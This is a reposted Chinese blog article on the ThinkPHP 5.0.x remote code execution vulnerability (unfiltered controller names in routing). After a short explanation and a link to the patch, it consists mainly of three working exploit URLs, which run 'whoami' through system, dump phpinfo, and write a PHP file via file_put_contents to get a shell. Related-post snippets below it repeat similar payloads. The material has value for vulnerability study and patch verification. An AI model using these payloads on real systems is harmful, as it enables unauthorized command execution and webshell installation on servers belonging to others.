ThinkPHP 5.0 get SHELL

最新推荐文章于 2024-08-07 18:27:39 发布
转载 最新推荐文章于 2024-08-07 18:27:39 发布 · 1k 阅读 · 0
文章标签:

#Thinkphp5.0

本文详细解析了ThinkPHP 5.0.x版本中存在的远程命令执行漏洞,包括利用system函数执行远程命令、通过phpinfo函数获取系统信息以及写入shell的三种攻击方式。揭示了在路由调度时未对控制器进行过滤的安全隐患。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f
路由信息中controller的部分进行了过滤,可知问题出现在路由调度时

关键代码:
在这里插入图片描述
在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。

1.利用system函数远程命令执行

http://localhost:9096/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2.通过phpinfo函数写出phpinfo()的信息

http://localhost:9096/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

3.写入shell:
http://localhost:9096/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo 'ok';?>

thinkphp5.x全版本任意代码执行getshell
bamanju0574的博客
09-23 4388
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.05.1版本,推荐尽快更新到最新版本。 主要是因为”\“的错误 补丁: Thinkphp v5.0.x补丁地址:https://github....
thinkphp5调用shell脚本_thinkphp5.x全版本任意代码执行getshell
weixin_32308155的博客
12-23 583
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.05.1版本,推荐尽快更新到最新版本。主要是因为”\“的错误补丁:环境地址:漏洞利用1.远程命令执行exp:http://localhost:9096/inde...
ThinkPHP5.0版本 远程命令执行漏洞GetShell
09-02 351
https://blog.csdn.net/Fly_hps/article/details/84954664 漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控...
php版本%3e=5.6,ThinkPHP5.0版本 远程命令执行漏洞GetShell
weixin_36427631的博客
03-19 356
https://blog.csdn.net/Fly_hps/article/details/84954664漏洞概况ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够...
THINKPHP5 getshell
公众号shadow sock7
12-11 8058
参考: https://mp.weixin.qq.com/s/oWzDIIjJS2cwjb4rzOM4DQ https://www.anquanke.com/post/id/167653 http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23及v5.1.31以下版本)_远程命令执行漏洞利用(getshell)/ ...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架,它提供了丰富的功能和良好的性能。然而,如同任何复杂的软件系统一样,它也存在安全漏洞。本次分析的焦点集中在...
thinkphp3.1.3 getshell_两个weblogic的漏洞的Getshell验证
weixin_39873456的博客
11-11 1053
本文复现了weblogic的Weblogic CVE-2019-2725和Weblogic CVE-2017-10271两个漏洞,从批量扫描到Getshell的整个过程。主要侧重如何构造Payload去GetShell(所以扫描工具和命令执行的截图是网图),批量扫描和命令执行直接找weblogic在github的几款工具即可。在这里就不分享了,只分享payload请求代码。有问题可以留言。Webl...
python3编写ThinkPHP命令执行Getshell的方法
09-19
### Python3 编写 ThinkPHP 命令执行 Getshell 的方法详解 #### 一、背景介绍 在 Web 应用开发中,ThinkPHP 是一个非常流行的 PHP 框架,因其良好的性能与丰富的功能而受到众多开发者的青睐。然而,任何框架或技术...
网络安全---渗透测试---框架漏洞-ThinkPHP5.0、Struts2
weixin_52796034的博客
11-05 1149
反弹shell(Reverse Shell)是一种计算机安全和网络攻击技术,通常被用于与远程目标系统建立命令行交互式连接。这个连接允许攻击者在远程系统上执行命令,获取系统访问权限,以及进行横向移动和数据操作。反弹shell的工作方式如下:攻击者和目标系统之间建立连接:通常,攻击者首先在目标系统上部署一个恶意程序(例如Trojan或后门),该程序会与攻击者的控制服务器建立连接。目标系统反弹连接:一旦恶意程序在目标系统上执行,它会尝试与攻击者的控制服务器建立连接。
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
ThinkPHP v5.x命令执行利用工具(可getshell
ThinkPHP v5.0.9 完整版
11-30
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
thinkphp v5.0.11漏洞_ThinkPHP 5.x 远程代码getshell漏洞实战分析
weixin_39700394的博客
12-21 351
ThinkPHP 简介ThinkPHP 是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,因为其易用性、扩展性,已经成长为国内颇具影响力的WEB应用开发框架漏洞解析漏洞引发的原因是框架对控制器名没有进行足够的检测,现拉取ThinkPHP v5.0.22 来进行测试请求路由=>http://127.0.0.1/public/index.php?s=/index/\think\ap...
ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞
Ambulong的博客
12-11 5685
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.05.1版本,推荐尽快更新到最新版本。 在线环境地址:https://www.vulnspy.com/cn-thinkphp-5.x-rce/ 执行phpi...
Thinkphp5x远程执行命令及getshell
最新发布
2201_75891821的博客
08-07 878
靶场:vulhub/thinkphp/5-rcedocker-compose up -d #启动环境。
【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)
weixin_34314962的博客
12-11 4171
0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell0x01步骤 点击start to hack 进入环境页面 run the project 然后访问给出的target address执行系统命令显示目录下文件http://aaa.vsplate.me:52763/public/index.php?s=/index...
ThiThinkPHP5.x 远程函数执行
有时候,想要一块二向箔
08-31 764
正文 实验地址:ThinkPHP5.x 远程函数执行与sql注入_安全龙-专注做企业网络安全服务与网络安全培训! (anquanlong.com) 知识梳理: PoC,全称“Proof of Concept”,中文“概念验证”,常指一段漏洞证明的代码。 Exp,全称“Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作。 Payload,中文“有效载荷”,指成功 exploit 之后,真正在目标系统执行的代码或指令。 Shellcode,简单翻译“shell 代码”,是 Payload 的一种,由于
ThinkPHP 5.0.22 5.1.29 GetShell Exploit
K8哥哥
01-11 1129
前言 使用Exp生成器生成Ladon插件实战,ThinkPHP GetShell 漏洞环境 使用docker ThinkPHP 5.0.20 复现测试 Payload: http://192.168.1.37:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]...
Thinkphp <= 5.0.10 缓存getshell复现
weixin_38170468的博客
07-24 492
目录 Thinkphp <= 5.0.10 缓存getshell复现 0x01 poc 0x02 跟踪源码 0x03 审计思路 0x04 补丁 0x05 参考 Thinkphp <= 5.0.1...
ThinkPHP5.0开发手册详尽解读
ThinkPHP5.0完全开发手册》是一份针对使用ThinkPHP5.0框架进行Web应用开发的技术文档,它以CHM(compiled HTML help)格式提供,即编译后的HTML帮助文件。这种格式常用于软件和技术文档的分发,以便用户在本地通过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值